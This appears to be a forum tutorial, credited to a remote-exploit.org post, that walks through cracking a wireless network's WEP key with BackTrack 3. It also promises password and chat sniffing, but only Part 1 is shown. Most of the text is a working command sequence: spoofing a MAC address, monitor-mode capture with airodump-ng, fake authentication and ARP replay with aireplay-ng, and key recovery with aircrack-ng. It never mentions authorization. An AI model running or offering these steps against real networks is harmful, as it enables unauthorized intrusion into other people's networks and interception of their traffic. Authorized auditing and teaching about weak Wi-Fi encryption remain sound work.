You'll need to know something about Backtrack to give this tutorial a try....or even know a bit about linux and you'll be fine!
Thanx to -wOne from remote-exploit.org for this little how to. Find a link to original post at the bottom. Some basic knowledge of linux commands will go along way. Backtrack isnt the easiest build to jump straight into as a newbie. Maybe try slackware or ubuntu first. This way you'll have the basics down pat to navigate your way around BT.

O.K folks, in this tut i am going to show you how to crack wep, Sniff non ssl & some ssl passwords over a wireless network & sniffing msn chats

Part. 1, Cracking WEP

my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way

so you will need backtrack 3 and a supported wifi card that can go into monitor mode (i have a ranlink 2500 card (ra0) )

open up a shell

ok so 1st we need to stop our wireless card so we do the airmon command

airmon-ng stop [wifi card extension e.g ath0]

now lets change our mac address

macchanger --mac 00:11:22:33:44:55 [wifi card extension]

now lets fire our card up in monitor mode

airmon-ng start [wifi card extension]

now we need the mac address of the AP we are hacking so lets do

airodump-ng [wifi card extension] now you will see your AP. Take note of the mac address/ BSSID and the channel, now hit CTRL+C to stop airodump jumping channels or you will come into problems later on.

now lets start capturing the data packets we need for the hack so type

airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi card extension] so for example

airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0

once you have done that command you should see some info come up clients, mac address, channel, data ect now you should see the data filling up we need the data to get to about 10-15 thousand to crack the key so we need to speed it up we get a lot of data in a short space of time.

we are now going to use aireplay so open up another shell and type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi card extension] for example

aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

now once you see authentication successful proceed to replay a data packet to the access point which will force it to send out lots of packets we can use to crack the key so do,

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi card extension] for example

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

now aireplay will start reading the packets and once it finds one you can use for the hack it will prompt you to use that packet? just hit y then enter now on the airodump shell you will see the data filling up very fast ance it gets to 10,000 run this command:

aircrack-ng -b [mac address/ bssid] [file name you used earlier +-01.cap] for example

aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap

and aircrack will start decrypting the packets/ IV's and find the wep key!

if this is your first time doing wep cracking it should take about 10-20 mins at first and you will start progressing to 8 mins, 5 mins, 3 mins ect

other tuts to follow! [[its 03:45am in the uk :O]]

thanks for reading!!

will also get some screen shots up tomorrow.

http://forums.remote-exploit.org/showthread.php?t=18270